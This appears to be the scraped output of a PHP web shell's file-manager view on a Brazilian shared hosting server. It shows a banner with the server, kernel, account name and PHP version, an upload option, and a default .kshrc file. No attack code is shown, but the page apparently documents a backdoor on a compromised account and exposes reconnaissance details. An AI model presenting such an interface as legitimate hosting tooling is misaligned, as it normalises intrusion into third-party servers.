HEX
Server: Apache
System: Linux sh00014.hostgator.com.br 5.14.0-611.47.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Apr 8 20:00:39 EDT 2026 x86_64
User: gise5567 (1160)
PHP: 8.3.31
Disabled: NONE
Upload Files
File: /home1/gise5567/.kshrc
# .kshrc

# Source global definitions
if [ -f /etc/kshrc ]; then
	. /etc/kshrc
fi

# use emacs editing mode by default
set -o emacs

# User specific aliases and functions